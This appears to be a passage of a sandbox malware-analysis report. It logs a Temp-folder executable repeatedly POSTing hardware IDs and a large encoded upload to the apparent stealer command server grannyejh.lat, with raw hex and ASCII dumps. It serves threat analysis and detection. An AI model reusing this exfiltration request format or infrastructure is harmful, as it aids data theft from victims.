                                                                                                                                                                                          2024-12-18 08:07:50 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                          Data Ascii: fok 8.46.123.189
                                                                                                                                                                                          2024-12-18 08:07:50 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          11192.168.2.849732172.67.179.1094433060C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-18 08:07:51 UTC269OUTPOST /api HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=C14W5ZZH
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                          Content-Length: 15020
                                                                                                                                                                                          Host: grannyejh.lat
                                                                                                                                                                                          2024-12-18 08:07:51 UTC15020OUTData Raw: 2d 2d 43 31 34 57 35 5a 5a 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 43 36 46 35 36 34 42 31 38 36 38 32 41 43 42 30 30 44 35 37 46 39 44 44 44 33 37 42 45 30 43 0d 0a 2d 2d 43 31 34 57 35 5a 5a 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 43 31 34 57 35 5a 5a 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 36 39 38 39 37 38 33 33 37 30 0d 0a 2d 2d 43 31 34 57 35 5a 5a 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73
                                                                                                                                                                                          Data Ascii: --C14W5ZZHContent-Disposition: form-data; name="hwid"8C6F564B18682ACB00D57F9DDD37BE0C--C14W5ZZHContent-Disposition: form-data; name="pid"2--C14W5ZZHContent-Disposition: form-data; name="lid"yau6Na--6989783370--C14W5ZZHContent-Dis
                                                                                                                                                                                          2024-12-18 08:07:52 UTC1034INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Wed, 18 Dec 2024 08:07:52 GMT
                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Set-Cookie: PHPSESSID=lk7eignsc3sor1ka7psu7pk2as; expires=Sun, 13-Apr-2025 01:54:31 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qTsHzA8ptkhJh%2FZTgoIVg3GDRSQ8X68QkIqHaD0YIYydI14H9e3rbwn7RgMT%2Fjw6kMb%2Bh6Zr6oIS%2B509bpLtHLMiCPghS1iKGOkuqIqVTMMh49bCqyj7Lh5La79QkDME"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                          CF-RAY: 8f3da964bbfb42b1-EWR
                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2089&min_rtt=2087&rtt_var=787&sent=12&recv=19&lost=0&retrans=0&sent_bytes=2830&recv_bytes=15947&delivery_rate=1386514&cwnd=211&unsent_bytes=0&cid=042b9def09c98080&ts=801&x=0"
                                                                                                                                                                                          2024-12-18 08:07:52 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                          Data Ascii: fok 8.46.123.189
                                                                                                                                                                                          2024-12-18 08:07:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          12192.168.2.849734172.67.179.1094433060C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-18 08:07:54 UTC275OUTPOST /api HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=0055V99GUATAED
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                          Content-Length: 20223
                                                                                                                                                                                          Host: grannyejh.lat
                                                                                                                                                                                          2024-12-18 08:07:54 UTC15331OUTData Raw: 2d 2d 30 30 35 35 56 39 39 47 55 41 54 41 45 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 43 36 46 35 36 34 42 31 38 36 38 32 41 43 42 30 30 44 35 37 46 39 44 44 44 33 37 42 45 30 43 0d 0a 2d 2d 30 30 35 35 56 39 39 47 55 41 54 41 45 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 30 30 35 35 56 39 39 47 55 41 54 41 45 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 36 39 38 39 37 38 33 33 37 30 0d 0a 2d 2d 30 30 35
                                                                                                                                                                                          Data Ascii: --0055V99GUATAEDContent-Disposition: form-data; name="hwid"8C6F564B18682ACB00D57F9DDD37BE0C--0055V99GUATAEDContent-Disposition: form-data; name="pid"3--0055V99GUATAEDContent-Disposition: form-data; name="lid"yau6Na--6989783370--005
                                                                                                                                                                                          2024-12-18 08:07:54 UTC4892OUTData Raw: 00 00 00 00 00 00 00 00 e8 73 23 d1 61 a9 ef 87 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 3e 37 1c 1d 96 fa 7e 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 73 c3 c1 e7 62 c9 e0 95 58 f0 4a f0 ab c1 ff 36 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fc e4 dd 93 3c 16 af 54 8b b3 c5 72 6e a6 5a 98 2a 94 a7 ae e5 a6 2a 8d 72 3d 31 9a 3c bc 29 a5 d6 98 ff 70 58 68 ff bb af ff fe e4 44 a2 4b 2d b9 ca 4c ae 76 b9 91 af 16 6a c9 bb 46 a2 8c 4b 7d 38 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 61 38 3a 2c f5 fd 30 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                          Data Ascii: s#a>7~sbXJ6<TrnZ**r=1<)pXhDK-LvjFK}8a8:,0
                                                                                                                                                                                          2024-12-18 08:07:55 UTC1036INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Wed, 18 Dec 2024 08:07:54 GMT
                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Set-Cookie: PHPSESSID=9ni2li5v6sf3dbvhmgiqdm1jvu; expires=Sun, 13-Apr-2025 01:54:33 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c1w7gcrsk0KYXHwIjQfJ4SR7imChJrqiuynvteEB8mhxVNTwiz2jLpKOhJ%2FtkMKHueAz4KzzbhKL%2F2lIhF%2F1I4T%2FW3%2BGbYIQ3frPAgRGHHmjVppbD4m2QqR9ZGwGTBZS"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                          CF-RAY: 8f3da97458645e79-EWR
                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1701&min_rtt=1682&rtt_var=644&sent=12&recv=23&lost=0&retrans=0&sent_bytes=2831&recv_bytes=21178&delivery_rate=1736028&cwnd=222&unsent_bytes=0&cid=15c3e29cfdc44764&ts=898&x=0"
                                                                                                                                                                                          2024-12-18 08:07:55 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                          Data Ascii: fok 8.46.123.189
                                                                                                                                                                                          2024-12-18 08:07:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          13192.168.2.849736172.67.179.1094433060C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-18 08:07:57 UTC276OUTPOST /api HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=RHCMICRUC9ZD1TDE
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                          Content-Length: 1252
                                                                                                                                                                                          Host: grannyejh.lat
                                                                                                                                                                                          2024-12-18 08:07:57 UTC1252OUTData Raw: 2d 2d 52 48 43 4d 49 43 52 55 43 39 5a 44 31 54 44 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 43 36 46 35 36 34 42 31 38 36 38 32 41 43 42 30 30 44 35 37 46 39 44 44 44 33 37 42 45 30 43 0d 0a 2d 2d 52 48 43 4d 49 43 52 55 43 39 5a 44 31 54 44 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 52 48 43 4d 49 43 52 55 43 39 5a 44 31 54 44 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 36 39 38 39 37 38 33 33 37 30 0d
                                                                                                                                                                                          Data Ascii: --RHCMICRUC9ZD1TDEContent-Disposition: form-data; name="hwid"8C6F564B18682ACB00D57F9DDD37BE0C--RHCMICRUC9ZD1TDEContent-Disposition: form-data; name="pid"1--RHCMICRUC9ZD1TDEContent-Disposition: form-data; name="lid"yau6Na--6989783370
                                                                                                                                                                                          2024-12-18 08:07:57 UTC1029INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Wed, 18 Dec 2024 08:07:57 GMT
                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Set-Cookie: PHPSESSID=n3mugo4f1v0bgbvc3tn27aogne; expires=Sun, 13-Apr-2025 01:54:36 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JUO9tIgTnksihmoOOHHnSjPzL2iqKYC2dgvy53pfM6PAMCFdx0oIdENlUM3NtEv%2BS05Ybh3xtjmSaPoYquc7fX%2BlgNPYlT2tiTTUvIynQaXCy6JIMltGRLBeg6M%2BuDuC"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                          CF-RAY: 8f3da9871a76f795-EWR
                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1585&min_rtt=1579&rtt_var=605&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=2164&delivery_rate=1788120&cwnd=185&unsent_bytes=0&cid=0d6f74f253d766eb&ts=773&x=0"
                                                                                                                                                                                          2024-12-18 08:07:57 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                          Data Ascii: fok 8.46.123.189
                                                                                                                                                                                          2024-12-18 08:07:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          14192.168.2.849737172.67.179.1094433060C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-18 08:07:59 UTC274OUTPOST /api HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=K1V74VAR1EBA
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                          Content-Length: 571367
                                                                                                                                                                                          Host: grannyejh.lat
                                                                                                                                                                                          2024-12-18 08:07:59 UTC15331OUTData Raw: 2d 2d 4b 31 56 37 34 56 41 52 31 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 43 36 46 35 36 34 42 31 38 36 38 32 41 43 42 30 30 44 35 37 46 39 44 44 44 33 37 42 45 30 43 0d 0a 2d 2d 4b 31 56 37 34 56 41 52 31 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4b 31 56 37 34 56 41 52 31 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 36 39 38 39 37 38 33 33 37 30 0d 0a 2d 2d 4b 31 56 37 34 56 41 52 31
                                                                                                                                                                                          Data Ascii: --K1V74VAR1EBAContent-Disposition: form-data; name="hwid"8C6F564B18682ACB00D57F9DDD37BE0C--K1V74VAR1EBAContent-Disposition: form-data; name="pid"1--K1V74VAR1EBAContent-Disposition: form-data; name="lid"yau6Na--6989783370--K1V74VAR1
                                                                                                                                                                                          2024-12-18 08:07:59 UTC15331OUTData Raw: 56 66 84 31 36 72 a6 6a 92 6f c3 bc 45 85 ac 3c 3e 56 de 28 35 45 4f ea 4a 62 f9 64 5c 5d 72 31 a3 f2 b3 74 d1 08 9f d1 c3 f0 43 bd d8 58 f1 07 45 dc 62 3c 18 47 b5 4f f1 7e 19 aa d2 0d 12 38 77 a4 88 57 21 22 2b 5e ff 86 09 a1 7f 7f 34 ec 27 31 2b 44 67 a0 da 27 d7 c5 fa 8a 86 23 19 22 44 35 dd 29 03 80 b1 3d 51 81 3b 4d a2 64 cc 1b 19 c6 44 d8 13 9e 27 5b ab d2 fb 96 cc e1 98 41 98 2d 24 b8 25 81 e9 43 c3 f1 dc 5b 91 1a 1f af 8f db c6 a9 8f 2b bd fc e2 c0 7c e6 60 cd b2 a7 4b c7 6d df f2 7b 3c 07 07 a5 9d b8 f1 a2 d6 0f 7c d7 2a 34 37 96 fe b8 cb ed 48 80 32 51 91 ac 30 12 2c 30 4d c9 d7 74 6d 20 75 60 2f 32 b2 fb fd 24 77 1a a5 cd 6f 58 70 0f 8d 45 6f d7 87 ed b3 34 c4 c2 b3 f8 12 4a f2 0a fb 4a 31 24 a9 f4 f5 55 cb 8b 66 6a 05 5f ac 7b fa 3d b9 3f 26
                                                                                                                                                                                          Data Ascii: Vf16rjoE<>V(5EOJbd\]r1tCXEb<GO~8wW!"+^4'1+Dg'#"D5)=Q;MdD'[A-$%C[+|`Km{<|*47H2Q0,0Mtm u`/2$woXpEo4JJ1$Ufj_{=?&
                                                                                                                                                                                          2024-12-18 08:07:59 UTC15331OUTData Raw: 5e 3f ca da c3 f0 03 e6 1b c7 6e f7 73 9f c0 04 66 fd 9a f9 40 4b 4a 41 25 bb 79 a2 f3 d1 c7 f0 0a d1 db f4 1f be a2 51 2f 4a 79 ef 7f 44 12 ba 3a d8 2f 1c 08 1e bd 9d 86 f3 07 32 d7 16 de 0c 57 f7 7e 50 25 35 1c d9 7d 87 dd 59 56 3b 9e 58 ed 55 54 35 bf 1e 32 ec 55 36 32 19 ce 5d c9 ac aa 5a d8 fc 10 e2 37 7b b4 8c fc e5 ef d7 10 e3 5d 00 f7 93 93 d6 4f b3 80 ff 7e 64 96 af 74 e8 ab c3 75 05 dc c5 f3 ac c1 cc c0 9d a1 2f 62 ce 1b 87 14 e4 a4 96 36 7f dc 5e a3 8f fe ab 26 6c e2 fc f5 f5 46 86 e8 d8 f2 7d 87 ea f9 6f e1 ac b1 a7 82 35 1d bf d7 4c fe a4 f0 ad 86 d3 51 c5 2c d2 9e 1b 49 7b e8 5d fe 2a b7 af 0f 0b 5b 19 73 4a 1c aa ee be 1b 2a b9 f9 cf 10 7b bd aa 9e 3f 87 a5 1c 36 1a f9 d5 c3 c0 a2 bc 23 f2 c1 7e ef a0 20 d8 af 71 f2 d9 0e 23 ef 4f fb 30 30
                                                                                                                                                                                          Data Ascii: ^?nsf@KJA%yQ/JyD:/2W~P%5}YV;XUT52U62]Z7{]O~dtu/b6^&lF}o5LQ,I{]*[sJ*{?6#~ q#O00
                                                                                                                                                                                          2024-12-18 08:07:59 UTC15331OUTData Raw: 0f a7 cd dc a2 df b4 e0 4b 5f bf 7f 5c f3 45 31 38 c1 fc b8 50 a9 ef 0a 69 52 3b f4 27 16 bb 1d e0 c3 7f 69 f3 4f fa aa d7 37 be e4 c6 31 05 ac 0b 91 ac 8a b9 57 8e c9 62 e2 7d 11 9b 24 dd b4 94 ea 4a 19 cf 86 de 80 a2 66 e8 5f e6 c4 9f 2d b0 d4 67 f9 14 46 9b f1 b3 09 87 01 66 dd 9f d1 74 cf ad d3 87 1b 79 e7 bf a2 22 ad 9f ef 90 7c 31 03 80 67 a7 e2 0c e6 2b 27 eb 9e ff e6 b2 fe 9b c8 e9 d3 be a5 94 ac 8d 6e da 65 bd f1 9e 96 d1 17 92 be e7 c2 e0 cf ab f1 6c 18 e2 96 8c e2 3c 56 dd 8e e9 c0 bb b8 e0 c9 57 17 cc 0c 56 64 6d 47 ed a8 0e 8e 96 38 1b 15 90 cc 5d f6 34 5d bb f7 85 fa 93 35 90 67 4a 9f 7b 54 bc 73 77 ff d7 21 fb ed 00 fd 9d c2 12 30 9c f8 19 49 a2 29 d0 8c f8 81 2e 3f 14 cd 0b 26 ca b3 35 d0 dd 3c cc 59 04 50 42 52 f0 d7 a4 8e 27 f3 57 65 4a
                                                                                                                                                                                          Data Ascii: K_\E18PiR;'iO71Wb}$Jf_-gFfty"|1g+'nel<VWVdmG8]4]5gJ{Tsw!0I).?&5<YPBR'WeJ
                                                                                                                                                                                          2024-12-18 08:07:59 UTC15331OUTData Raw: 84 44 c1 eb 76 6d 43 cd 55 bf 09 5f 55 47 64 ed 42 75 e0 d8 e0 10 93 b3 78 5c 13 a2 9d e1 b5 9b 66 bb 25 86 7f 5d 4a 52 c7 f4 69 88 03 97 a7 52 a7 af 82 29 d6 0e 4f fd 03 6d dd c4 16 f3 2b 54 f5 0b 35 06 d5 46 ad 8c 95 88 d6 ff 6d 5d 47 70 dd b5 cc 38 15 1e a1 52 75 3a 13 03 b2 ca 11 6f fe 9f 50 fd 7f 72 b6 01 9c 66 66 4b 11 01 73 18 70 0d 3d 35 62 2f 09 35 bd dc ee fa c5 09 58 c0 01 39 86 84 ec 86 1d 4b 04 08 dd ce 57 85 82 94 e0 74 e1 15 03 40 46 84 89 82 03 5d 77 80 69 77 7d 30 86 ad 86 6a 39 e5 6f 54 38 d4 32 87 ff 67 12 d5 8b 3e 3a d4 2a 5e 80 8c 79 25 41 fe 60 06 e1 e4 33 ea 42 8c be cb 05 bd 9e cd 77 17 c5 11 65 c8 69 5a 6c 2b ae d7 51 38 79 d0 30 a5 3a 56 e9 86 e8 14 4a c0 82 48 45 6c 1e 5e 6a a7 23 88 ec 8b 3e d6 9b b3 1f 37 c3 75 b9 3b 6b 15 54
                                                                                                                                                                                          Data Ascii: DvmCU_UGdBux\f%]JRiR)Om+T5Fm]Gp8Ru:oPrffKsp=5b/5X9KWt@F]wiw}0j9oT82g>:*^y%A`3BweiZl+Q8y0:VJHEl^j#>7u;kT
                                                                                                                                                                                          2024-12-18 08:07:59 UTC15331OUTData Raw: 86 8f 7e 49 ba 9a ee f5 0b 1e 2f b2 ac 94 e9 01 a0 c2 4b 1a 59 f0 9b 56 4d 40 5d d1 6c a4 42 0c 36 77 99 bb 06 07 9f d0 b2 84 34 2d 49 10 94 3f 97 fb df 3a bb 7e bb 66 5e e1 32 b8 e3 f7 8c cf 77 64 1c e6 8f f4 bf 33 13 05 00 e0 08 03 8d 44 28 14 30 d7 a7 a6 1e 8c a4 9d 87 f3 c3 eb b0 27 94 1b 9d b7 7b 20 ae 7a ff 61 03 b0 86 cd 53 e0 d5 1f 23 37 87 28 02 e0 d5 52 1b 92 ae c0 a2 a7 84 fe 2a 3d 60 80 9d 0a d0 40 42 bc 88 43 08 13 2a fd 1e 93 7b 9a 10 13 59 ed fb a5 55 e0 85 be b7 e4 cd 96 91 bf 6f d8 b1 aa 3a 0e 39 0a 0b d7 3f d7 bb 55 7a fd 0d 44 1e df b8 bc 47 06 68 df 1c 9a f8 07 b3 f1 15 62 94 55 1f c3 31 04 c7 74 30 42 d0 42 a3 50 af e4 4f 59 7a e3 9e 4b 67 72 b1 be 85 05 35 04 fe 39 38 3e b1 4c 47 34 bc be 0d b6 cb 46 e5 21 b2 fa e2 41 6c e7 5f c9 c9
                                                                                                                                                                                          Data Ascii: ~I/KYVM@]lB6w4-I?:~f^2wd3D(0'{ zaS#7(R*=`@BC*{YUo:9?UzDGhbU1t0BBPOYzKgr598>LG4F!Al_
                                                                                                                                                                                          2024-12-18 08:07:59 UTC15331OUTData Raw: 39 00 dd 47 ad 0b e3 fc c4 0a 48 6a 04 dd e0 6e 50 e4 83 b8 f6 03 73 ca 8c 50 77 a2 c0 20 3e b5 ee b8 cf da be 16 33 15 c9 4d 40 ad c8 7d 29 db cd 86 83 a0 4e 2d a6 54 bf 80 f7 24 d7 6f 4f 31 36 a4 75 fe 0b 5d 90 91 54 cc c5 a2 14 ed 78 10 07 25 eb 6b 1f 42 64 76 01 db 25 75 cb 03 62 18 18 7f 36 dc de 94 50 69 f5 5c 1c fe 2c 90 c6 fa ed ca fa fd 4f 5d cd b3 08 ee 66 ce f6 24 47 e9 8d 6b 8d 22 c7 2c 98 a5 b0 70 64 63 8f 35 db 3c 7e 31 9c d5 96 b8 a3 1e 43 51 1f 62 50 19 84 f1 c6 bf df be f8 f5 c2 86 6e f7 0a d6 7d e6 35 ee 32 b2 ff 94 ba d1 ea 0c 7d 99 f5 cf 6e a9 01 aa 2a 43 07 3b d5 c3 03 6a 96 bf ff f4 bc 79 29 c4 d2 8a 50 14 b7 59 81 89 9a 7f a3 7a fa fe 89 3b f3 4e 7d 9e 7e b9 3d 4f 5b 04 02 e8 be 37 95 02 f1 da e2 b2 6b 4a 7b 51 f8 e8 d5 c2 47 15 a8
                                                                                                                                                                                          Data Ascii: 9GHjnPsPw >3M@})N-T$oO16u]Tx%kBdv%ub6Pi\,O]f$Gk",pdc5<~1CQbPn}52}n*C;jy)PYz;N}~=O[7kJ{QG
                                                                                                                                                                                          2024-12-18 08:07:59 UTC15331OUTData Raw: 8b b7 fc 39 68 57 e4 8b 55 13 2d de 1c 22 7b ae de 7d 74 6e 88 3f 43 aa f2 51 86 bf 69 7c ae 4e 5b 99 3b 34 39 a7 c3 dc 3d fc 6d f5 28 3f 67 c8 64 e6 58 fd 4d 76 35 29 58 f0 dd 76 90 2e a1 0e 1d 6b 02 e0 a8 0e 98 ee dc 59 11 07 91 9c 63 5e 7b b0 7a de 4c 02 b4 8c a8 d0 6a ee df a7 3d 10 35 0d ff ce dd a7 92 5a 20 e1 ba f5 c5 23 d7 1a 64 bc 4c ef 6f 91 68 11 ab 6f 66 8a 8b 53 44 56 8e 67 17 f6 55 36 3c 2f 2c fe 69 8d 60 4a a3 32 3e 37 b0 fe 13 82 87 a3 e1 13 a2 c0 8e fd 01 12 3c a9 a8 d2 03 48 d0 29 05 9a 4d 7b ed 36 27 49 46 42 54 72 8b 05 60 be ba 3f 18 f4 b5 ae 12 a6 48 27 04 20 e0 44 ce 8b 27 35 3e dc ab 18 be 8f b4 d3 18 32 e8 f6 c6 59 90 ae 89 bb 8c 81 84 81 0c 4f 03 68 e9 af 3f c4 32 dc 1c 0f c0 c3 fa 43 4c 2f 89 c7 95 65 92 40 88 e9 28 4d 67 a2 9b
                                                                                                                                                                                          Data Ascii: 9hWU-"{}tn?CQi|N[;49=m(?gdXMv5)Xv.kYc^{zLj=5Z #dLohofSDVgU6</,i`J2>7<H)M{6'IFBTr`?H' D'5>2YOh?2CL/e@(Mg
                                                                                                                                                                                          2024-12-18 08:07:59 UTC15331OUTData Raw: 7b c3 3c 38 24 80 f7 6d d9 66 e1 21 5b 1a 25 09 ae 6f f6 28 2f e1 5e b1 a2 bd 92 31 34 75 04 e4 29 c4 85 76 b9 6c bc 9f 7b 19 64 b4 2b d5 06 1d f6 b2 49 77 8c 3b 98 91 6a 9f 19 b9 5f b6 d9 56 ef 49 f5 53 4c bf 92 0a 1c 00 1d fc eb 1f dd 28 62 b6 ea 30 f3 2c e2 ef 2b 98 e4 79 46 3a 3b 97 85 f7 f6 81 7e ad 16 26 21 eb d0 d8 ec 5c e0 e0 1c d5 85 68 7e 40 9f 14 aa 97 70 68 43 50 94 17 4c 73 88 29 89 0a af bf 10 e6 46 45 29 c6 7c e9 d5 b7 7f c9 5f a3 34 dc 86 b0 c2 42 31 27 1c 86 aa 5e 3e c1 b7 f0 ea 94 29 6e 45 46 f2 1d e7 c3 7a 65 a8 aa cc ac 83 61 46 fc d6 16 f0 8c b1 a3 e7 ed c4 f8 70 78 f5 c9 1f ba 51 a4 0e 16 2a 96 f1 62 89 8b 05 c5 32 a5 c2 eb 67 2d a8 aa e8 6b 08 4a f3 8a c0 33 49 ae 6a 90 50 dc ba b7 2b 13 f4 82 00 01 ee 3b 6d 41 b9 1f db ce 6a da 45
                                                                                                                                                                                          Data Ascii: {<8$mf![%o(/^14u)vl{d+Iw;j_VISL(b0,+yF:;~&!\h~@phCPLs)FE)|_4B1'^>)nEFzeaFpxQ*b2g-kJ3IjP+;mAjE
